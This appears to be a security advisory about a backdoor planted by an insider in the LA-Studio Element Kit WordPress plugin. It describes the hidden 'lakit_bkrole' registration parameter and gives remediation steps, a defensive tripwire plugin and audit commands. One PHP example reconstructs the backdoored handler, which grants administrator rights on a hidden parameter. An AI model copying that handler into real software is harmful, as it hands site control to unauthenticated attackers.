Critical Backdoor Vulnerability in LA-Studio Element Kit Puts 20,000 WordPress Sites at Risk
A severe security flaw has been identified in the LA-Studio Element Kit for Elementor, a widely used WordPress plugin with over 20,000 active installations. The flaw lets an unauthenticated attacker create administrator accounts, which amounts to full control of the affected site. Tracked as CVE-2026-0920 and rated 9.8 (Critical) on the CVSS scale, it calls for immediate remediation.
Discovery and Exploitation Details
According to the disclosure, the backdoor was planted by a former employee who left LA-Studio in late December 2025. Before departing, the individual inserted concealed code into the plugin that grants administrative access on demand. The incident illustrates the risk posed by insider threats and the need to review code committed around staff departures with particular care.
Security experts Athiwat Tiprasaharn, Itthidej Aramsri, and Waris Damkham uncovered the backdoor on January 12, 2026, and promptly reported it through the Wordfence Bug Bounty Program. The vulnerability was swiftly addressed with the release of version 1.6.0 on January 14, 2026, just two days after its discovery.
Technical Analysis
The flaw resides in all versions up to and including 1.5.6.3 of the LA-Studio Element Kit for Elementor plugin. No authentication is required: an attacker submits a crafted registration request to the plugin's registration handler with the `lakit_bkrole` parameter included, and the resulting account is created with full administrative privileges on the targeted WordPress site. From there the attacker can upload malicious files, alter content, redirect visitors to harmful websites, or inject spam.
Vulnerability Details:
– Vulnerability Name: Unauthenticated Privilege Escalation via Backdoor to Administrative User Creation
– CVE ID: CVE-2026-0920
– CVSS Score: 9.8 (Critical)
– Affected Plugin: LA-Studio Element Kit for Elementor
– Plugin Slug: lastudio-element-kit
– Affected Versions: ≤ 1.5.6.3
– Patched Version: 1.6.0
– Active Installations: 20,000+
– Attack Vector: `lakit_bkrole` parameter in registration request
– Vulnerability Type: Backdoor / Administrative User Creation
– Discoverers: Athiwat Tiprasaharn, Itthidej Aramsri, Waris Damkham
– Bounty Amount: $975.00
– Discovery Date: January 12, 2026
– Patch Release Date: January 14, 2026
– Wordfence Protection: January 13, 2026 (Premium), February 12, 2026 (Free)
Obfuscation Techniques
The backdoor was deliberately obfuscated so that it would not stand out during code review or automated scanning, which is why it survived in the plugin's codebase until it was found. The obfuscated code hooked the user registration process and assigned administrator capabilities to a newly created account whenever the hidden parameter was present.
Mechanism of the Backdoor
The backdoor lives in the plugin's registration handling. Analysis showed that the `ajax_register_handle` function contained obfuscated logic that checked for the `lakit_bkrole` parameter during user registration. When the parameter was present, the function registered additional filters that assigned administrator privileges to the new account. The obfuscation relied on string manipulation and indirect function calls, so the malicious branch read like ordinary plugin code rather than an obvious role assignment. The practical consequence for reviewers is that a search of the plugin source for literal role names or hook names is not enough to rule out this class of backdoor; the review has to follow how strings are assembled at runtime and which callbacks end up attached to the registration path.
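The pattern described above, as an added illustration in PHP rather than code from the plugin or from the Wordfence analysis: the real backdoor was obfuscated and is not reproduced here; this shows the equivalent plain-text logic next to a hardened handler. The parameter name `lakit_bkrole` and the function name `ajax_register_handle` come from the advisory; the class name, the choice of the `pre_option_default_role` hook, the AJAX action name and the nonce name are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Shows the general pattern the
// advisory describes: a registration handler that reads a hidden request
// parameter and, through a filter, hands the new account the administrator
// role. lakit_bkrole and ajax_register_handle come from the advisory; the
// class name, hook choice, AJAX action and nonce name are assumed.

class Lakit_Register_Demo {

    // Backdoored variant (hypothetical plain-text reconstruction).
    public function ajax_register_handle_backdoored() {
        $username = sanitize_user( wp_unslash( $_POST['username'] ?? '' ) );
        $email    = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );
        $password = (string) ( $_POST['password'] ?? '' );

        // The only difference from a benign handler: a hidden parameter
        // overrides the site's default role for this one request.
        if ( isset( $_POST['lakit_bkrole'] ) ) {
            add_filter( 'pre_option_default_role', function () {
                return 'administrator';
            } );
        }

        // wp_create_user() takes the role from get_option('default_role'),
        // so the filter above turns the new user into an administrator.
        $user_id = wp_create_user( $username, $password, $email );
        if ( is_wp_error( $user_id ) ) {
            wp_send_json_error( $user_id->get_error_message() );
        }
        wp_send_json_success( array( 'id' => $user_id ) );
    }

    // Hardened variant: the role is never derived from request data or
    // from the filterable default_role option, registration honours the
    // site setting, and the nonce check stops cross-site abuse.
    public function ajax_register_handle_hardened() {
        check_ajax_referer( 'lakit_register', 'nonce' );

        if ( ! get_option( 'users_can_register' ) ) {
            wp_send_json_error( 'Registration is disabled.' );
        }

        $username = sanitize_user( wp_unslash( $_POST['username'] ?? '' ), true );
        $email    = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );
        $password = (string) ( $_POST['password'] ?? '' );

        if ( '' === $username || ! is_email( $email ) || strlen( $password ) < 12 ) {
            wp_send_json_error( 'Invalid registration data.' );
        }

        $user_id = wp_insert_user( array(
            'user_login' => $username,
            'user_email' => $email,
            'user_pass'  => $password,
            // Pin the role explicitly; any extra POST fields are ignored.
            'role'       => 'subscriber',
        ) );
        if ( is_wp_error( $user_id ) ) {
            wp_send_json_error( $user_id->get_error_message() );
        }
        wp_send_json_success( array( 'id' => $user_id ) );
    }
}

$lakit_demo = new Lakit_Register_Demo();
// Assumed AJAX action name; only the hardened handler is wired up.
add_action( 'wp_ajax_nopriv_lakit_register', array( $lakit_demo, 'ajax_register_handle_hardened' ) );
```

The point of the comparison is that the two handlers are nearly identical: the backdoor is a single conditional that changes which role a perfectly normal `wp_create_user()` call ends up with. Obfuscate the string `administrator` and the hook name, and that conditional no longer matches anything a reviewer would search for, which is why the hardened version pins the role in the `wp_insert_user()` call instead of trusting a filterable option.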
Recommendations for Site Administrators
Administrators using the LA-Studio Element Kit for Elementor plugin should take the following actions immediately:
1. Update the Plugin: Update to version 1.6.0 or later. The update removes the backdoor but does not undo anything an attacker already did through it, so the remaining steps still apply.
2. Review User Accounts: List every account with the administrator role, compare it against known staff, and check registration dates and email addresses. Remove any account you cannot account for and rotate the credentials of the rest.
3. Conduct Security Audits: Look for the kinds of changes an administrator-level attacker can make: unexpected files in the uploads, plugins or themes directories, modified plugin or core files, altered content, and redirects to external sites.
4. Enhance Monitoring: Alert on new accounts created with the administrator role, on accounts promoted to administrator, and on requests that still carry the `lakit_bkrole` parameter, which after patching can only be probes.
5. Educate Staff: Raise awareness among staff about the risks of insider threats and the importance of secure coding practices and reviewed commits.
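For recommendations 2 and 4, an added must-use plugin example (not part of LA-Studio Element Kit or of the Wordfence advisory) that logs administrator creations and promotions, trips on any request still carrying `lakit_bkrole`, and provides a helper that lists administrators registered after a given date for manual review. The `lakit_tripwire_` prefix, the log format and the use of `error_log()` are assumptions; the hooks `init`, `user_register` and `set_user_role` are standard WordPress actions.

```php
<?php
/**
 * Plugin Name: Admin Account Tripwire (added example)
 * Description: Drop into wp-content/mu-plugins/. Logs new administrators,
 *              promotions to administrator, and requests carrying the
 *              lakit_bkrole parameter. Not part of LA-Studio Element Kit.
 */

// Assumed helper: writes to the PHP error log. Swap in wp_mail() or a
// forwarder to your SIEM if you need alerts rather than log lines.
function lakit_tripwire_log( $message ) {
    error_log( sprintf(
        '[admin-tripwire] %s ip=%s uri=%s',
        $message,
        $_SERVER['REMOTE_ADDR'] ?? '-',
        $_SERVER['REQUEST_URI'] ?? '-'
    ) );
}

// 1. Tripwire on the backdoor parameter itself. On a patched site the
//    parameter does nothing, so any request carrying it is a probe.
add_action( 'init', function () {
    if ( isset( $_REQUEST['lakit_bkrole'] ) ) {
        lakit_tripwire_log( 'request carried lakit_bkrole' );
    }
} );

// 2. Accounts that start life as administrator. user_register fires after
//    wp_insert_user() has assigned the role, so the role is visible here.
add_action( 'user_register', function ( $user_id ) {
    $user = get_userdata( $user_id );
    if ( $user && in_array( 'administrator', (array) $user->roles, true ) ) {
        lakit_tripwire_log( 'new administrator created: ' . $user->user_login );
    }
}, 10, 1 );

// 3. Existing accounts promoted to administrator. set_user_role also fires
//    for brand-new users with an empty $old_roles; those are covered by the
//    user_register hook above, so only real promotions are logged here.
add_action( 'set_user_role', function ( $user_id, $role, $old_roles ) {
    if ( 'administrator' === $role
        && ! empty( $old_roles )
        && ! in_array( 'administrator', (array) $old_roles, true ) ) {
        $user = get_userdata( $user_id );
        lakit_tripwire_log( 'account promoted to administrator: ' . ( $user ? $user->user_login : $user_id ) );
    }
}, 10, 3 );

// 4. Audit helper for the account review: administrators whose
//    user_registered date is on or after $since (e.g. '2025-12-01'),
//    newest first. WP_User_Query's date_query targets user_registered.
function lakit_admins_registered_since( $since ) {
    return get_users( array(
        'role'       => 'administrator',
        'date_query' => array( array( 'after' => $since, 'inclusive' => true ) ),
        'orderby'    => 'registered',
        'order'      => 'DESC',
    ) );
}
```

The audit helper can be driven from WP-CLI, for example `wp eval 'foreach ( lakit_admins_registered_since( "2025-12-01" ) as $u ) echo "$u->ID $u->user_login $u->user_email $u->user_registered\n";'`; without the plugin, `wp user list --role=administrator --fields=ID,user_login,user_email,user_registered` gives the same list for manual comparison against known staff. Because an account created through the backdoor is an ordinary administrator once it exists, the tripwire is about catching the next attempt; the review of existing accounts is still a manual step.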
Broader Implications
This incident underscores the importance of internal security controls and the damage an insider can do with commit access. Organizations should require reviewed, attributable commits, pay particular attention to code landed around employee departures, and revoke access promptly when staff leave. For site owners, regular security assessments and prompt updates remain the baseline for keeping WordPress installations intact.
Conclusion
The backdoor in the LA-Studio Element Kit for Elementor plugin is a reminder that a trusted plugin can become the attack vector. Updating to 1.6.0 or later closes the hole; reviewing administrator accounts, auditing the site for changes made through it, and monitoring for further attempts are what actually restores confidence in an affected installation.